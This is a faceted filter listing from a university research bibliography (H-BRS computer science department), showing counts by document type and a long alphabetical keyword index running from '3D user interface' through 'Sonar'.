Refine
H-BRS Bibliography
- yes (979)
Departments, institutes and facilities
- Fachbereich Informatik (979)
Document Type
- Conference Object (571)
- Article (221)
- Preprint (50)
- Report (41)
- Part of a Book (31)
- Doctoral Thesis (20)
- Conference Proceedings (14)
- Research Data (11)
- Book (monograph, edited volume) (9)
- Master's Thesis (6)
Year of publication
Language
- English (979)
Keywords
- Virtual Reality (13)
- Robotics (12)
- Machine Learning (10)
- virtual reality (10)
- 3D user interface (7)
- Quality diversity (7)
- Augmented Reality (6)
- Robotik (6)
- Usable Security (6)
- Benchmarking (5)
- Measurement (5)
- Navigation (5)
- Virtual reality (5)
- computer vision (5)
- haptics (5)
- robotics (5)
- ARRs (4)
- Big Data Analysis (4)
- CUDA (4)
- Computer Graphics (4)
- Computer Vision (4)
- Deep Learning (4)
- FDI (4)
- GDPR (4)
- Image Processing (4)
- Knowledge Graphs (4)
- LoRa (4)
- Natural Language Processing (4)
- Perception (4)
- Quality Diversity (4)
- Risk-based Authentication (4)
- SpMV (4)
- Taxonomy (4)
- Visualization (4)
- embedded systems (4)
- machine learning (4)
- security (4)
- 802.11 (3)
- Aerodynamics (3)
- Algorithms (3)
- Augmented reality (3)
- BPMS (3)
- Bayesian optimization (3)
- Bioinformatics (3)
- Bond graph modelling (3)
- Cooperative Awareness Message (3)
- FPGA (3)
- Force field (3)
- Human-Robot Interaction (3)
- Hyperspectral image (3)
- IP protection (3)
- Intelligent Transport System (3)
- LoRaWAN (3)
- MAP-Elites (3)
- Object recognition (3)
- OpenFlow (3)
- Performance (3)
- Privacy (3)
- Pseudonym Concept (3)
- Ray Tracing (3)
- Ray tracing (3)
- Risk-based Authentication (RBA) (3)
- Robot sensing systems (3)
- Robustness (3)
- Security (3)
- Software (3)
- Surrogate Modeling (3)
- Transformers (3)
- UAV (3)
- Vehicular Ad hoc Networks (3)
- Virtuelle Realität (3)
- WiLD (3)
- clustering (3)
- foveated rendering (3)
- guidance (3)
- incremental bond graphs (3)
- motion estimation (3)
- parallel breadth-first search (3)
- post-buckling (3)
- power electronic systems (3)
- serious games (3)
- simulation (3)
- vection (3)
- virtual environments (3)
- 3D user interfaces (2)
- 3D-Scanner (2)
- AML (2)
- ARIMA (2)
- Active Learning (2)
- Adaptive Case Management (2)
- Alternatives (2)
- Artificial Intelligence (2)
- Authentication (2)
- Authentication features (2)
- Autoencoder (2)
- Automatic Short Answer Grading (2)
- B2T (2)
- BCL2 (2)
- BFS (2)
- Bag of Features (2)
- Black-Box Optimization (2)
- Blocking (2)
- Bond graphs (2)
- Business-to-Thing (2)
- Cognition (2)
- Cognitive robot control (2)
- Compositional Pattern Producing Networks (2)
- Content Module (2)
- Control Systems and Automation (2)
- Cutting sticks problem (2)
- DPA (2)
- Digitisation (2)
- Distributed rendering (2)
- Domestic Robots (2)
- Drosophila (2)
- Dynamic Case Management (2)
- EEG (2)
- Educational institutions (2)
- Electrical Machines and Power Electronics (2)
- Embedded software (2)
- Empirical study (2)
- Evolutionary Computation (2)
- Evolutionary computation (2)
- Evolutionary optimization (2)
- Explainable robotics (2)
- Eye Tracking (2)
- FOS: Computer and information sciences (2)
- Fas (2)
- Fault analysis (2)
- Fault detection and isolation (2)
- Fuzzy logic (2)
- GPU (2)
- Garbage collection (2)
- Generative Models (2)
- Graphics Cards (2)
- Grasping (2)
- HSP90 (2)
- Head-mounted Display (2)
- Heart Rate Prediction (2)
- Higher education (2)
- Human computer interaction (2)
- Human factors (2)
- Human-Centered Design (2)
- Human-Centered Robotics (2)
- Human-Computer Interaction (2)
- Humans (2)
- Hybrid systems (2)
- Hyper-parameter Tuning (2)
- IEEE 802.11 (2)
- IEEE802.11 (2)
- Incremental bond graph (2)
- Indirect Encodings (2)
- Inductive Logic Programming (2)
- Intel Xeon Phi (2)
- Intelligent controls (2)
- Intelligent virtual agents (2)
- Interaction Patterns (2)
- Internet (2)
- Internet of Things (2)
- Java virtual machine (2)
- LOTUS Sensor Node (2)
- Large, high-resolution displays (2)
- Lattice Boltzmann Method (2)
- Learning and Adaptive Systems (2)
- Learning from experience (2)
- Long-Distance WiFi (2)
- Low-Power Wide Area Network (LP-WAN) (2)
- MESD (2)
- Machine learning (2)
- Modelica (2)
- NUMA (2)
- Naive physics (2)
- Neuroevolution (2)
- Nvidia graphic processors (2)
- Object Detection (2)
- Object detection (2)
- Optimization (2)
- Original Story (2)
- Parallelization (2)
- Parameter sensitivities of transfer functions (2)
- Password (2)
- Path Loss (2)
- Perceptual Upright (2)
- QoS (2)
- RE (2)
- RGB-D (2)
- Raman microscopy (2)
- Rapid Prototyping (2)
- Reasoning (2)
- Rendering (2)
- Renewable Energy Systems (2)
- SDN (2)
- SEMA (2)
- Scale Tuning (2)
- Serious Games (2)
- Set partition problem (2)
- Side Channel Analysis (2)
- Side-channel analysis (2)
- Simulation (2)
- Single Instruction Multiple Data (SIMD) (2)
- Skin detection (2)
- Smart Card (2)
- Sparse Matrix Vector Multiplication (2)
- Sparse Matrix Vector multiply (SpMV) (2)
- Support Vector Machine (2)
- Survey (2)
- Three-dimensional displays (2)
- TinyECC 2.0 (2)
- Unity (2)
- Urban (2)
- Usability (2)
- Usable Security and Privacy (2)
- User Interface Design (2)
- VR (2)
- Vehicle-to-Vehicle Communication (2)
- Watermarking (2)
- WiFi (2)
- Wireless Sensor Network (2)
- Wireless backhaul (2)
- YAWL (2)
- adaptive fault thresholds (2)
- aerodynamics (2)
- analysis (2)
- automated sensor-screening (2)
- biometrics (2)
- blockchain (2)
- bond graph modelling (2)
- classifier combination (2)
- confidence level (2)
- convolutional neural networks (2)
- data filtering (2)
- data locality (2)
- deep learning (2)
- diagnostic bond graphs (2)
- diversity (2)
- domestic robots (2)
- dynamic vector fields (2)
- edutainment (2)
- external faults (2)
- eye-tracking (2)
- fault detection (2)
- feature (2)
- feature extraction (2)
- flight zone (2)
- geofence (2)
- human factors (2)
- hypermedia (2)
- ideal switches (2)
- image fusion (2)
- industrial robots (2)
- interaction (2)
- interface design (2)
- intrinsics (2)
- leaning (2)
- machine vision (2)
- memory bandwidth (2)
- monitoring (2)
- multisensory cues (2)
- naive physics (2)
- navigation (2)
- neural network (2)
- nonlinear stability (2)
- object categorization (2)
- object detection (2)
- optic flow (2)
- optical sensor (2)
- pansharpening (2)
- path planning (2)
- peripheral vision (2)
- physical activity (2)
- redundant work (2)
- reinforcement learning (2)
- residual sinks (2)
- robot competitions (2)
- robot dynamics (2)
- robot execution failures (2)
- robot introspection (2)
- self-motion perception (2)
- semiconducting metal oxide gas sensor array (2)
- service robots (2)
- short-term load forecasting (2)
- spatial updating (2)
- speech understanding (2)
- structural equation modeling (2)
- surrogate modeling (2)
- text mining (2)
- traffic surveillance (2)
- transfer learning (2)
- usable privacy (2)
- user study (2)
- vibration (2)
- 16S rRNA gene sequencing (1)
- 2D Level Design (1)
- 3D Segmentation (1)
- 3D User Interface (1)
- 3D design (1)
- 3D gaming (1)
- 3D interfaces (1)
- 3D navigation (1)
- 3D nucleus (1)
- 3D real-time echocardiography (1)
- 3D registration (1)
- 3D shape (1)
- 450 MHz (1)
- ABT-737 (1)
- ACPYPE (1)
- AD (1)
- AES (1)
- AI based translation (1)
- AI usage in sports (1)
- ALPS (1)
- AMBER (1)
- AMD Family 15h (1)
- ANSYS (1)
- API Documentation (1)
- API Gebrauchstauglichkeit (1)
- API usability (1)
- AR (1)
- ARM Cortex M3 Processor (1)
- Absolute nodal coordinate formulation (1)
- Abstract Syntax Tree (1)
- Acceptance (1)
- Account (Datenverarbeitung) (1)
- Account Security (1)
- Accuracy (1)
- Active locomotion (1)
- Active vision interface (1)
- Actuators (1)
- Acute lymphoblastic leukemia (1)
- Adaptation of Software (1)
- Adaptive Behavior (1)
- Adaptive Control (1)
- Advanced Driver Assistance Systems (1)
- Affordances (1)
- Agent-Based Modeling (1)
- Agents (1)
- Air Pollution (1)
- Air Pollution Monitoring (1)
- Air pollution modeling (1)
- Alkane (1)
- All-Swap Algorithm (1)
- Analysis of Bond Graph Models (1)
- Antifuse memory (1)
- Apprenticeship Learning (1)
- Architectural Patterns (1)
- Artificial Intelligence (cs.AI) (1)
- Artificial Intelligence and Natural Language Processing (1)
- Assistenzsystem (1)
- Assistive robots (1)
- Attention (1)
- Auditory Cueing (1)
- Ausbreitung (1)
- Authentifikation (1)
- Authorship watermark (1)
- Autoimmune disease (1)
- Automated Modelling (1)
- Automated design (1)
- Automation (1)
- Autonomous Driving (1)
- Autonomous Systems (1)
- Autonomy (1)
- Autotuning (1)
- Available Bandwidth (1)
- B-cell leukemia (1)
- B-cell lymphoma (1)
- BERT (1)
- BH3-mimetic inhibitor (1)
- BLOB Detection (1)
- Background music (1)
- Bacteria, Anaerobic (1)
- Ball Tracking (1)
- Ball tracking (1)
- Ballastless track (1)
- Bandwidth Estimation (1)
- Basis set (1)
- Bayesian Deep Learning (1)
- Beacon Chain (1)
- Behaviour-Driven Development (1)
- Benchmark (1)
- Best practice algorithms (1)
- Bicycle Simulator (1)
- Bildverarbeitung (1)
- Blob Detection (1)
- Block cipher (1)
- Blockchain (1)
- Bond Graph Modelling (1)
- Bond Graph modelling and simulation (1)
- Bond Graph models for fault detection and isolation (1)
- Bond graph (1)
- Bondgraph (1)
- Bound Volume Hierarchy (1)
- Bounding Box (1)
- Bounding box explanations (1)
- Branch and cut (1)
- Business Case (1)
- Business software (1)
- Business system (1)
- CAS (1)
- CEHL (1)
- CIBERSORT (1)
- CMMN (1)
- CNN (1)
- CPA (1)
- CPU (1)
- CPUID instruction (1)
- CREBBP (1)
- CSR5BC (1)
- Cache line fingerprinting (1)
- Cache-independent (1)
- Calibration (1)
- Camera selection (1)
- Camera view analysis (1)
- Canonical form of state equations and standard interconnection form for robustness study (1)
- Capability framework (1)
- Capacity (1)
- Carbohydrate (1)
- Case-Based Reasoning (1)
- Cell Processor (1)
- Cell/B.E. (1)
- Center-of-Mass (1)
- Centrifugation (1)
- Centrifuge (1)
- Cervical cancer screening (1)
- Cervicovaginal microbiome (1)
- Chalcogenide glass sensor (1)
- Challenges (1)
- Change-Prozess (1)
- Channel assignment (1)
- Chemical imaging (1)
- Chip ID (1)
- Chloroquine (1)
- Circular saws (1)
- Classification explanations (1)
- Classifiers (1)
- Cleaning Task (1)
- Climate Risks (1)
- Cloud Computing (1)
- Cloud computing (1)
- Clustering (1)
- Clusters (1)
- Co-creative processes (1)
- Co-located Collaboration (1)
- Co-located work (1)
- Co-rotational formulation (1)
- Code Generation (1)
- Code similarity analysis (1)
- Cognitive informatics (1)
- Cognitive robotics (1)
- Collaborating industrial robots (1)
- Coloured pointclouds (1)
- Colposcopy (1)
- Column (1)
- Comparative Analysis (1)
- Comparative analysis (1)
- Complex Event Processing (1)
- Complexity (1)
- Compliant Manipulation (1)
- Compliant fingers (1)
- Component Models (1)
- Composition of Patterns (1)
- Computational Fluid Dynamics (1)
- Computational causality (1)
- Computational chemistry (1)
- Computational creativity (1)
- Computational fluid dynamics (1)
- Computational modeling (1)
- Computer Automated Design (1)
- Computer Science - Computer Vision and Pattern Recognition (1)
- Computer Science - Learning (1)
- Computer Vision System (1)
- Computer architecture (1)
- Computer graphics (1)
- Computer-supported Cooperative Work (1)
- Computergrafik (1)
- Computersicherheit (1)
- Computersimulation (1)
- Computing methodologies (1)
- Concurrent Kleene Algebra (1)
- Concurrent repeated failure prognosis (1)
- Conformation (1)
- Congenital heart disease (1)
- Connectivity in rural areas (1)
- Container Structure (1)
- Containerization (1)
- Content Analysis (1)
- Content Security Policies (1)
- Contextualized Attention Metadata (CAM) (1)
- Continual robot learning (1)
- Control (1)
- Convexity (1)
- Corporate Social Responsibility (1)
- Correlative Microscopy (1)
- Cortex-M3 (1)
- Counterfeit protection (1)
- Coupled process (1)
- Covert channel (1)
- Created Gravity (1)
- Critical power (1)
- Cross-core (1)
- Cross-sensitivity (1)
- Crossmedia (1)
- Cryptography (1)
- Crystal structure (1)
- Current research information systems (1)
- Customization (1)
- CyberGlove (1)
- Cybersickness (1)
- Cypher (1)
- DAE systems (1)
- DCF (1)
- DFA Lab (1)
- DNA extraction protocols (1)
- DNA profile (1)
- DOI (1)
- DPA Lab (1)
- Data Fusion (1)
- Data Generation (1)
- Data Protection Officer (1)
- Data Publication (1)
- DataCite (1)
- Database Management Systems (1)
- Databases and Data Mining (1)
- Dataflow Programming (1)
- Datalog (1)
- Declarative Process Modeling (1)
- Deklarative Prozessmodellierung (1)
- Delphi Study (1)
- Demonstration-based training (1)
- Design Optimization (1)
- Design automation (1)
- Developer Centered Security (1)
- Diagnostic bond graph-based online fault diagnosis (1)
- Diagnostic bond graphs (1)
- Difference Visualization (1)
- Differential analysis (1)
- Digital Ecosystem (1)
- Digital Object Identifier (1)
- Digital Storytelling (1)
- Digital common goods (1)
- Digital watermarking (1)
- Dimensionality reduction (1)
- Directional Antenna (1)
- Directional antennas (1)
- Discrete cosine transform (1)
- Displacement (1)
- Distance Perception (1)
- Distributed Robot Systems (1)
- Divergent optimization (1)
- Docker (1)
- Domain Expert (1)
- Domain-Specific Language (1)
- Domain-Specific Languages (1)
- Domain-Specific Modeling Languages (1)
- Domestic robotics (1)
- Domestic robots (1)
- Domestic service robots (1)
- Drahtloses lokales Netz (1)
- Drug (1)
- Drug resistance (1)
- Dynamic motion primitives (1)
- E-Health (1)
- ELM (1)
- ELMo (1)
- EM leakage (1)
- EN-12299 (1)
- ERP (1)
- ERP-software (1)
- ERP-system (1)
- ETV6-RUNX1 (1)
- Earth Observation (1)
- Eclipse Modeling Framework (1)
- Ecosystem simulation (1)
- Edutainment (1)
- Efficiency (1)
- Ego-Motion Estimation (1)
- Elderly People (1)
- Electric mobility (1)
- Electromagnetic Fields (1)
- Electronic tongue (1)
- Elephantiasis (1)
- Elliptic Curve Cryptography (1)
- Embedded system (1)
- Emotion (1)
- Empirical Study (1)
- Empirical formula (1)
- Employee Privacy (1)
- Employee data protection (1)
- EnOcean (1)
- Encryption (1)
- Enterprise software (1)
- Enterprise system (1)
- Entropy (1)
- Environment Perception (1)
- Environmental Data (1)
- Eriodictyol (1)
- Escape analysis (1)
- Estimation (1)
- Ethereum (1)
- Euler–Bernoulli beam (1)
- Evaluation (1)
- Evaluation als Kommunikationsanlass (1)
- Event detection (1)
- Everyday object manipulation (1)
- Evolutionary algorithms (1)
- Ewing's Sarcoma Family of Tumors (1)
- Exchange and reuse of bond graph models (1)
- Executive functions (1)
- Exercise (1)
- Exergame (1)
- Experiment (1)
- Experiment design (1)
- Expert Interviews (1)
- Expert system (1)
- Explainability (1)
- Explainable Artificial Intelligence (XAI) (1)
- Explainable Machine Learning (1)
- External faults (1)
- FGR (1)
- FPGA implementation (1)
- FS20 (1)
- Face and hand gesture recognition (1)
- Facial Emotion Recognition (1)
- Factory instrumentation (1)
- Failure Prognosis (1)
- Fault Channel Watermarking Lab (1)
- Fault Detection & Diagnosis (1)
- Fault Diagnosis (1)
- Fault accommodation (1)
- Fault diagnosis (1)
- Fault handling (1)
- Fault simulation (1)
- Fault-channel watermarks (1)
- Feature Model (1)
- Feature extraction (1)
- Features (1)
- Feedback (1)
- Female (1)
- Field Study (1)
- Field programmable gate arrays (1)
- Field sequential imaging (1)
- Filtering (1)
- Fingerprint watermark (1)
- Finite element modelling (1)
- First-order frequency domain sensitivities (1)
- Five Factor Model (1)
- Fixed spatial data (1)
- Flexible multibody system (1)
- Flexible robots (1)
- Fluency (1)
- Focus plus context (1)
- Force (1)
- Force and tactile sensing (1)
- Foreground segmentation (1)
- Forests (1)
- Formal definition and validation of the content of a model description (1)
- Forms of mathematical models (1)
- Forschungsbericht (1)
- Foveated rendering (1)
- Free-Space Loss (FSL) (1)
- Frequency planning (1)
- Friction (1)
- Functional Programming (1)
- Functional safety (1)
- Fusion (1)
- Future (1)
- Future Studies (1)
- Future of Robotics (1)
- GDDL (1)
- GLI (1)
- GPGPU (1)
- GPT (1)
- GPT-2 (1)
- Gabor filter (1)
- Gabor filters (1)
- Game Engine (1)
- Games (1)
- Games and Simulations for Learning (1)
- Gaussian processes (1)
- Gaze Behavior (1)
- Gaze Depth Estimation (1)
- Gaze-contingent depth-of-field (1)
- Gender Issues in Computer Science Education (1)
- Generation R (1)
- Generative Design (1)
- Genetic Predisposition to Disease (1)
- Genetic algorithm (1)
- Genomics (1)
- Genomics/methods (1)
- Geo-tagging (1)
- Gesamt-Exom-Sequenzierung (1)
- Gesture Recognition (1)
- Gesture-based HRI (1)
- Givens Rotations (1)
- Global Illumination (1)
- Global illumination (1)
- Glycam06 (1)
- Gradient-based explanation methods (1)
- Gradient-boosting (1)
- Grailog (1)
- Graph Convolutional Neural Networks (1)
- Graph embeddings (1)
- Graph theory (1)
- Graphical user interfaces (1)
- Grasp Domain Definition Language (1)
- Grasp Planner (1)
- Gravitation (1)
- Gromacs (1)
- Grounded Method (1)
- Group Behavior (1)
- Group behavior (1)
- Group behavior analysis (1)
- Groupware (1)
- HCI (1)
- HCSS (1)
- HDAC inhibitor (1)
- HDBR (1)
- HIF1α (1)
- HPC (1)
- HPV diagnostic (1)
- HRI (1)
- HSP70 (1)
- HTTP (1)
- Hand Guidance (1)
- Hand Tracking (1)
- Hand injuries (1)
- Hardware (1)
- Head Mounted Display (1)
- Head-Mounted Displays (1)
- Header whitelisting (1)
- Healthcare logistics (1)
- Heat Shock Protein (1)
- Heat shrink tubing (1)
- High hyperdiploidy (1)
- High-performance computing (1)
- High-resolution displays (1)
- High-speed railway track (1)
- High-speed track (1)
- Highly Automated Driving (1)
- Histograms (1)
- HomeMatic (1)
- Hough Forests (1)
- Human Factors (1)
- Human centered computing (1)
- Human orientation perception (1)
- Human robot interaction (1)
- Human-robot interaction (1)
- Humanoid Robot (1)
- Hybrid Failure Prognosis (1)
- Hybrid Systems (1)
- Hybrid models (1)
- Hybrid models of engineering systems (1)
- Hydraulic orifices (1)
- Hydrocarbon (1)
- Hydroxychloroquine (1)
- HyperNEAT (1)
- IC identification (1)
- ICF (1)
- ICP (1)
- IEC 104 (1)
- IEC 61850 (1)
- IEEE 802.21 (1)
- ISO9999 (1)
- IT professionals (1)
- IaaS (1)
- Ikaros (1)
- Illumination algorithms (1)
- Image Classification (1)
- Image representation (1)
- Image-based rendering (1)
- Immersion (1)
- Immersive Virtual Environments (1)
- Immersive Visualization Environment (1)
- Immersive analytics (1)
- Implementation Challenges (1)
- Increasing fault magnitude (1)
- Incremental true bond graphs (1)
- Industrial robots (1)
- Industry 4.0 (1)
- Information Privacy (1)
- Information Security (1)
- Information Types (1)
- Information hiding (1)
- Information interaction (1)
- Informationsflüsse (1)
- Innovation (1)
- Input reconstruction (1)
- Instance-based learning (1)
- Instantaneous assignment (1)
- Instantiation (1)
- Instruction design (1)
- Instruction scheduling (1)
- Integer programming (1)
- Integral backstepping technique (1)
- Integrate Development Environment (1)
- Integrated circuit interconnections (1)
- Intel processors (1)
- Intelligent Autonomous Systems (1)
- Interaction (1)
- Interaction devices (1)
- Interactive Object Detection (1)
- Interactive Smart Card Applications (1)
- Interaktion (1)
- Interbank Market (1)
- Interference (1)
- Interferenz (1)
- Intermediaries (1)
- Intermittent faults (1)
- Interoperability (1)
- Inventory (1)
- Inverse simulation (1)
- IoT (1)
- Issue Tracking Systems (1)
- Issue Types (1)
- Issue tracking systems (1)
- JavaScript (1)
- KNN (1)
- KNX (1)
- Knowledge Management (1)
- Knowledge Worker (1)
- Knowledge representation (1)
- Knowledge-intensive Process (1)
- LAA (1)
- LBP (1)
- LDP (1)
- LGCSR (1)
- LSTM (1)
- LTE-M (1)
- LTE-U (1)
- Laminar and turbulent flow (1)
- Language Engineering (1)
- Language learning (1)
- Large display interaction (1)
- Large high-resolution displays (1)
- Large-Scale Online Services (1)
- Lattice Basis Reduction (1)
- Laws of programming (1)
- Lead userness (1)
- Leakage circuits (1)
- Learning analytics (1)
- Learning data mining (1)
- Learning from demonstration (1)
- Learning systems (1)
- Leg (1)
- Lennard-Jones parameters (1)
- Leukemia (1)
- Level-of-Detail (1)
- Library model (1)
- Ligands (1)
- Light curtain (1)
- Lighting simulation (1)
- Linear inverse models (1)
- Linear quadratic regulator (1)
- Linear regression (1)
- Liquidity Crises (1)
- LoRa receiver accuracy (1)
- Locomotion (1)
- Login (1)
- Long-Term Autonomy (1)
- Longley-Rice (1)
- Longley-Rice Irregular Terrain Model (ITM) (1)
- Lymphedema (1)
- Lymphoproliferative disorder (1)
- MAC (1)
- MACE (1)
- MBZ (1)
- METEOR score (1)
- MIMD (1)
- MOOC (1)
- MOX gas sensors (1)
- MP2.5 (1)
- MPLS (1)
- MQTT (1)
- Machine Learning (cs.LG) (1)
- Machine-learning (1)
- Main Memory (1)
- Maker space (1)
- Male (1)
- Malware (1)
- Management (1)
- Manipulation tasks (1)
- Manipulator (1)
- Markov Cluster Algorithm (1)
- Mathematical methods (1)
- Maximal covering location problem (1)
- Mebendazole (1)
- Media in education (1)
- Megatrends (1)
- Memory (1)
- Memory filesystem (1)
- Memory management (1)
- Memory-Constrained Devices (1)
- Mesh networks (1)
- Meteorological Data (1)
- Methodologies (1)
- Microarchitectural Data Sampling (MDS) (1)
- Microgravity (1)
- Middleware and Programming Environments (1)
- Mining Software Repositories (1)
- Mining software repositories (1)
- Mixed (1)
- Mixed method evaluation (1)
- Mobile devices (1)
- Mobile manipulation (1)
- Mobile robotics (1)
- Mobile robots (1)
- Mobiler Roboter (1)
- Modalities (1)
- Mode switching LTI model (1)
- Mode-dependent ARRs (1)
- Model Fitting (1)
- Model-Based Software Development (1)
- Model-Driven Engineering (1)
- Model-based Approach (1)
- Model-based Fault Diagnosis (1)
- Model-based failure prognosis (1)
- Model-based fault detection and isolation (1)
- Model-driven Development (1)
- Model-driven engineering (1)
- Model-free control (1)
- Modelling (1)
- Models of Variable Structure (1)
- Modular software packages (1)
- Molecular dynamics (1)
- Molecular modeling (1)
- Molecular rotation (1)
- Molecular structure (1)
- Morphological box (1)
- Morphological scheme (1)
- Motion (1)
- Motion Capture (1)
- Motion Sickness (1)
- Motion planning (1)
- Multi-Modal Interaction (1)
- Multi-Solution Optimization (1)
- Multi-Tenant Application (1)
- Multi-camera (1)
- Multi-component heavy metal solution (1)
- Multi-object visualization (1)
- Multi-objective (1)
- Multi-objective optimization (1)
- Multi-robot systems (1)
- Multi-stage (1)
- Multibody systems (1)
- Multicast communication (1)
- Multidisciplinary systems (1)
- Multidisciplinary Dynamic Systems (1)
- Multilayer interaction (1)
- Multimodal (1)
- Multimodal Microspectroscopy (1)
- Multimodal hyperspectral data (1)
- Multimodal optimization (1)
- Multiple Displays (1)
- Multisensory cues (1)
- Multithreaded and multicore architecture (1)
- Multiuser (1)
- Multivariate Time Series (1)
- Multivariate time series classification (1)
- Musical Performance (1)
- N200 (1)
- NEAT (1)
- NETCONF (1)
- NFKB (1)
- NGS (1)
- NIR (1)
- NIR-point sensor (1)
- NISTPQC (1)
- NLP (1)
- NNS (1)
- NURBS (1)
- NVIDIA Tesla (1)
- Narration Module (1)
- Natural language understanding (1)
- Natural scene text (1)
- Navigation interface (1)
- Network simulation verification (1)
- Networked Robots (1)
- Neural Machine Translation (1)
- Neuroscience (1)
- Noise (1)
- Noise reduction (1)
- Nonbonded scaling factor (1)
- Nonlinear control quadrotor uav (1)
- Numerical optimization (1)
- OCT (1)
- OCU (1)
- OER (1)
- Object Segmentation (1)
- Object detectors (1)
- Object-Based Image Analysis (OBIA) (1)
- Object-oriented physical systems modelling (1)
- Older adults (1)
- Online Services (1)
- Ontology (1)
- Open Access (1)
- Open innovation (1)
- Open source firmware (1)
- Open source software (1)
- Open-ended Robotic Discovery (1)
- Open-source (1)
- OpenACC (1)
- OpenDaylight (1)
- OpenMP (1)
- OpenMP, unrolling (1)
- OpenStack (1)
- Optical Flow (1)
- Optical flow (1)
- Optimisation 3D (1)
- Organic compounds and Functional groups (1)
- Out Of Distribution (OOD) data (1)
- Out-of-view Objects (1)
- Outer Space Research (1)
- Outlier Detection (1)
- Outside-in process (1)
- P300 (1)
- PAD (1)
- PAIS (1)
- PCR inhibitors (1)
- PDSTSP (1)
- PHR (1)
- PIR sensor units (1)
- PM2.5 estimation (1)
- PSD (1)
- PaaS (1)
- Pain Reduction (1)
- Parallel I/O (1)
- Parallel Processing (1)
- Parallel drone scheduling traveling salesman problem (1)
- Parameter degradation model (1)
- Parameter sensitivities of the residuals of analytical redundancy relations (1)
- Parameter uncertainties (1)
- Parametric study (1)
- Part Segmentation (1)
- Passwort (1)
- Path loss model (1)
- Pattern recognition (1)
- Pedigree (1)
- People Detection (1)
- Performance Simulation (1)
- Performance benchmarks (1)
- Performance prediction (1)
- Performance profiling (1)
- Periodic structures (1)
- Personal Health Record (1)
- Personality (1)
- Phenotypic niching (1)
- Physical activity (1)
- Physical exercising game platform (1)
- Plan-based robot control (1)
- Point Cloud Segmentation (1)
- Point Clouds (1)
- Pointing (1)
- Pointing Gesture Detection (1)
- Pointing Gesture Recognition (1)
- Pointing devices (1)
- Poisson Disc Distribution (1)
- Polymorphism, Single Nucleotide (1)
- Pose Estimation (1)
- Post-Quantum Signatures (1)
- Power Analysis (1)
- Precursor B-Cell Lymphoblastic Leukemia-Lymphoma/genetics (1)
- Prediction of physiological responses to strain (1)
- Predictive Models (1)
- Presence (1)
- Pressure wire (1)
- Pressure-volume relation (1)
- Privacy engineering (1)
- Privacy patterns (1)
- Probabilistic model (1)
- Process Automation (1)
- Process Models (1)
- Process views (1)
- Project based learning (1)
- Pronunciation (1)
- Proof of Stake (1)
- Proof-of-Stake (1)
- Proof-of-Work (1)
- Propagation (1)
- Protective system (1)
- Prototypes (1)
- Proximity (1)
- Prozessautomation (1)
- Prudential Regulation (1)
- Psychology (1)
- Public Key Infrastructure (1)
- Public Key Infrastructures (1)
- Q measurement (1)
- Qualitative reasoning (1)
- Quality control (1)
- Quality of Service (1)
- Qualitätspakt Lehre (1)
- Quantitative analysis of explanations (1)
- Quantum mechanical methods (1)
- Quantum mechanics (1)
- RAS (1)
- RBAR (1)
- RFID (1)
- RGB-D data (1)
- RLE-XOR (1)
- RLE-permutation (1)
- RMS acceleration (1)
- RNN (1)
- ROPOD (1)
- RSSI (1)
- Radiance caching (1)
- Radiofrequency identification (1)
- Radix Sort (1)
- Raman spectroscopy (1)
- Random number generator (1)
- Rapid prototyping (1)
- Raumwahrnehmung (1)
- Re-authentication (1)
- Reader (1)
- Real-Time Image Processing (1)
- Real-time image processing (1)
- Recommender systems (1)
- Reconstruction Error (1)
- Refinement (1)
- Reflectance modeling (1)
- Registration Refinement (1)
- Relapse (1)
- Relational Learning (1)
- Relative Energies (1)
- Remaining Useful Life (1)
- Remaining Useful Life (RUL) estimates (1)
- Render Cache (1)
- Repositories (1)
- Requirements (1)
- Requirements Communication (1)
- Requirements Engineering (1)
- Requirements analysis (1)
- Requirements engineering in SMEs (1)
- Restorative Virtual Environments (1)
- Reusable Software (1)
- Reversible Logic Synthesis (1)
- Review (1)
- Right to Informational Self-Determination (1)
- Risk-Based Account Recovery (1)
- RoboCup (1)
- RoboCup industrial (1)
- Robot Perception (1)
- Robot commands (1)
- Robot competitions (1)
- Robot failure diagnosis (1)
- Robot kinematics (1)
- Robot learning (1)
- Robot software (1)
- Robotic Governance (1)
- Robotic Natives (1)
- Robotic Revolutions (1)
- Robotic Technology (1)
- Robotic faults (1)
- Robotics (cs.RO) (1)
- Robotics competitions (1)
- Robots (1)
- Robust grasping (1)
- Rotating Table Test (1)
- Rule-based production systems (1)
- RuleML (1)
- Runtime Adaptation (1)
- Rural areas (1)
- S3D Video (1)
- S3D video (1)
- SAHA (1)
- SAML (1)
- SARS-CoV-2 (1)
- SDWN (1)
- SIMD (1)
- SIMPACK (1)
- SLIDE algorithm (1)
- SME (1)
- SMPA loop (1)
- SOA (1)
- SOAP (1)
- SORT (1)
- SQL (1)
- STAT3 (1)
- SVG (1)
- SVM (1)
- SaaS (1)
- Saccades (1)
- Saccadic suppression (1)
- Safety (1)
- Safety guard (1)
- Saliency maps (1)
- Sanity checks for explaining detectors (1)
- Scalability (1)
- Scalable Vector Graphic (1)
- ScalarMultiplication (1)
- Scene text recognition, active vision, domestic robot, pantilt, auto-zoom, auto-focus, adaptive aperture control (1)
- Scene understanding through Deep Learning (1)
- Scholarly workbench (1)
- School experiments (1)
- Scientific competency development (1)
- Scientific workbench (1)
- Second Life (1)
- Secure Coding Practices (1)
- Segmentation (1)
- Self-motion perception (1)
- Self-supervised learning (1)
- Semantic Segmentation (1)
- Semantic gap (1)
- Semantic models (1)
- Semantic scene understanding (1)
- Semantic search (1)
- Semantics (1)
- Sense of presence (1)
- Sensitivity matrix in symbolic form (1)
- SensorFusion (1)
- Separation algorithm (1)
- Service Robot (1)
- Service-Oriented Architecture (1)
- Service-based cloud computing (1)
- Shadow detection (1)
- Sicherheits-APIs (1)
- Side Channel Countermeasures (1)
- Side Channel Watermarking Lab (1)
- Side channel attack (1)
- Side channels (1)
- Side-channel watermarking (1)
- Signal (1)
- Signal detection (1)
- Signal processing (1)
- Signature Verification (1)
- Silmitasertib (1)
- Similarity matrix (1)
- Simulator (1)
- Single-objective (1)
- Skin (1)
- Slippage detection (1)
- Smart Card User Interface Design, Interactive Smart Card Applications (1)
- Smart Grid (1)
- Smart Home (1)
- Smart InGaAs camera-system (1)
- Smart factory (1)
- Smartphone (1)
- Smartphones (1)
- Social Virtual Reality (1)
- Social engagement in university (1)
- Social intelligence (1)
- Sociomateriality (1)
- Software Architecture (1)
- Software Architectures (1)
- Software Development Process (1)
- Software Feature Request Detection (1)
- Software Framework (1)
- Software IP protection (1)
- Software Supply Chain (1)
- Software and Architecture (1)
- Software reverse engineering (1)
- Softwareentwicklung (1)
- Somatogravic Illusion (1)
- Sonar (1)
